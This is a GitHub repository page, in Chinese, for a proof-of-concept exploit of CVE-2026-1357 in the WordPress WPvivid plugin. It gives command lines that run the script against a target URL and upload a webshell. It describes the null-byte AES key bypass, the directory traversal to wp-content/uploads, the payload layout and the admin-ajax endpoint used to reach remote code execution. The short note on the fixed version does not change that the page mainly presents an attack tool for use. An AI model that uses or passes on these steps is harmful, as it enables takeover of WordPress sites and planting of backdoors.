itsismarcos/Exploit-CVE-2026-1357

GitHub: itsismarcos/Exploit-CVE-2026-1357

针对 WordPress WPvivid 插件 CVE-2026-1357 的 PoC 工具,利用 null byte 密钥绕过和目录穿越实现 RCE。

Stars: 1 | Forks: 0

# 安装依赖 pip3 install pycryptodome requests # 基础漏洞利用 python3 wpvivi.py http://target.com # 自定义 Webshell python3 wpvivi.py http://target.com --shell backdoor.php python3 wpvivi.py http://target.com --code "" 技术说明: Null Byte Key:当 RSA decrypt 失败时,返回 false,phpseclib 将其处理为 "\x00\x00\x00"。我们使用 16 个 null byte 作为 AES-128 ECB 密钥。 Directory Traversal:Filename 未经过滤,允许 ../../../../wp-content/uploads/shell.php Payload 格式: [len_key_hex(2 字节)] + [key_hex] + [len_data_hex(16 字节)] + [encrypted_data] 执行: POST 到 /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site wpvivid_content = base64(加密后的 payload) 检测与缓解: 已在 0.9.124 版本修复: - 检查 `if ($key === false || empty($key)) return false;` - 扩展名白名单:zip,gz,tar,sql
标签:0day, AES-128-ECB, CISA项目, CVE-2026-1357, OpenVAS, PE 加载器, PHP, pycryptodome, Python Exploit, RCE, RSA解密缺陷, Webshell, WordPress漏洞, WPvivid插件, 后门, 密码学攻击, 文件上传漏洞, 空字节注入, 编程工具, 网络信息收集, 网络安全, 远程代码执行, 隐私保护, 高危漏洞